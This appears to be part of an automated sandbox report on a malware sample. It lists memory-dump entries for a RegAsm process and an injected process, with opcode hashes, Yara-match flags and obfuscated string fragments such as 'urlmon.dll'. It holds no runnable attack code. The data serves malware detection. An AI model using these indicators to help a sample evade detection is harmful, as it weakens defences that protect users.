                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                    • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                    • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                    • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                    • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                    • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                    • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                    • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                    • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                    • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                    • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                    • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                    • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    APIs
                                                    Strings
                                                    • Kernel-MUI-Language-SKU, xrefs: 022D89FC
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 022D8914
                                                    • WindowsExcludedProcs, xrefs: 022D87C1
                                                    • Kernel-MUI-Language-Allowed, xrefs: 022D8827
                                                    • Kernel-MUI-Number-Allowed, xrefs: 022D87E6
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _wcsnlen
                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                    • API String ID: 3628947076-1387797911
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    APIs
                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02303F12
                                                    Strings
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0230E345
                                                    • Execute=1, xrefs: 02303F5E
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0230E2FB
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02303F4A
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02303EC4
                                                    • ExecuteOptions, xrefs: 02303F04
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02303F75
                                                    Similarity
                                                    • API ID: BaseDataModuleQuery
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 3901378454-484625025
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID: .$:$:
                                                    • API String ID: 3965848254-2308638275
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02312206
                                                    Strings
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 0231EA22
                                                      • Part of subcall function 022F13CB: ___swprintf_l.LIBCMT ref: 022F146B
                                                      • Part of subcall function 022F13CB: ___swprintf_l.LIBCMT ref: 022F1490
                                                    • ___swprintf_l.LIBCMT ref: 022F156D
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023122F4
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 0231230B
                                                    • RTL: Re-Waiting, xrefs: 02312328
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023122FC
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    Strings
                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0231248D
                                                    • RTL: Re-Waiting, xrefs: 023124FA
                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023124BD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                    • API String ID: 0-3177188983
                                                    • Opcode ID: 95828074d396b9b7c16398a9d47c607e1406fd3b7d7da97982e9648af45aab14
                                                    • Instruction ID: e6458271dd17936399490a5696fefac0d5b1d6ca624e94c80587e2ced6ce94ad
                                                    • Opcode Fuzzy Hash: 95828074d396b9b7c16398a9d47c607e1406fd3b7d7da97982e9648af45aab14
                                                    • Instruction Fuzzy Hash: FC41E670A10314ABD724EFA8CC95FAB77A9EF44720F108A05F9599B2C4D774E941CB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID:
                                                    • API String ID: 3965848254-0
                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction ID: b205d90fa7c2ee39407aaec1d7af6a0fb66da7856774b3d75e45fed5aa71ed69
                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction Fuzzy Hash: CC91F331D2020AEEDF28DFD8C9457EEB7B4FF41308FA4806AD806A7655E7305A40DB91
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: $$0
                                                    • API String ID: 1302938615-389342756
                                                    • Opcode ID: e459368f6591c5ec06b5e3e42908152f5c799708d94662c1407cabc9c6392a7c
                                                    • Instruction ID: 1a5ff2cda517e03406343776308448051c50bec77d94cb179dd09a6762b107fe
                                                    • Opcode Fuzzy Hash: e459368f6591c5ec06b5e3e42908152f5c799708d94662c1407cabc9c6392a7c
                                                    • Instruction Fuzzy Hash: 0D918C70D0438AEEDF24CFA9C4983FDBBB9AF01314F94867AD4A1A7299C7744641CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$O$S$\$s
                                                    • API String ID: 0-3854637164
                                                    • Opcode ID: 151e09cf65f0f751c6db297e0ae8fd33dcce5e08ccc42ffa15902fe58e44d839
                                                    • Instruction ID: 54d267db76691ee96473e99ba41883240c1c53216fec40c6a80db83e29e97fb9
                                                    • Opcode Fuzzy Hash: 151e09cf65f0f751c6db297e0ae8fd33dcce5e08ccc42ffa15902fe58e44d839
                                                    • Instruction Fuzzy Hash: FF51857AD04128ABDF10DFA8DC49EEEB37DAF45714F004299E90D97140E7719A588FA2
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d802af0e062529e49fd9b1e7908cc66d9a8f391173807913101ab49b213c7c71
                                                    • Instruction ID: 9bce4e27e240761c4555b83a83fdf08eccf8eb7a77cfde0cd1001af058585b5b
                                                    • Opcode Fuzzy Hash: d802af0e062529e49fd9b1e7908cc66d9a8f391173807913101ab49b213c7c71
                                                    • Instruction Fuzzy Hash: C0E0927981900CEBEF08CF68E841BDEBBA9DB05321F10436EE819CB280E63597548B42
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 552fb4393f17a8b273767768362a55393defdc292ee165eb9e961f1bb2424b9c
                                                    • Instruction ID: 237cfe9ee8cd9054e5a25afe7cf485ccca0cee245e0c9d182c6de9b939b888d4
                                                    • Opcode Fuzzy Hash: 552fb4393f17a8b273767768362a55393defdc292ee165eb9e961f1bb2424b9c
                                                    • Instruction Fuzzy Hash: 08E0463A200604BBD620AB69EC01E9BB7ADDFC6760F104429FA1CA7241DA71B9018AB5
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80db95437e89400a2709d7c7c3c260bbe43a585b604d60c3f22d39844ea39b09
                                                    • Instruction ID: 352f8cd5fae0a120e7a72cbeddfca75ef0a27c39c8139013cd70d627a7d1472c
                                                    • Opcode Fuzzy Hash: 80db95437e89400a2709d7c7c3c260bbe43a585b604d60c3f22d39844ea39b09
                                                    • Instruction Fuzzy Hash: 07C02B8F380001254C1531BC38800B13702489336532008F5F28AE824CF74148100343
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$@@@>$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                    • API String ID: 0-2725001343
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                    • API String ID: 0-1002149817
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                    • API String ID: 0-392141074
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                    • API String ID: 0-685823316
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$P$e$i$m$o$r$x
                                                    • API String ID: 0-620024284
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$1$5$7$>$K$N$c
                                                    • API String ID: 0-499563787
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$1$5$7$>$K$N$c
                                                    • API String ID: 0-499563787
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L$S$\$a$c$e$l
                                                    • API String ID: 0-3322591375
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: F$P$T$f$r$x
                                                    • API String ID: 0-2523166886
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $i$l$o$u
                                                    • API String ID: 0-2051669658
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$k$o
                                                    • API String ID: 0-3624523832
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$h$o
                                                    • API String ID: 0-3662636641
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$k$o
                                                    • API String ID: 0-3624523832
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                    • API String ID: 0-2877786613
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_26b0000_wfbjvizcWo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                    • API String ID: 0-2877786613
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
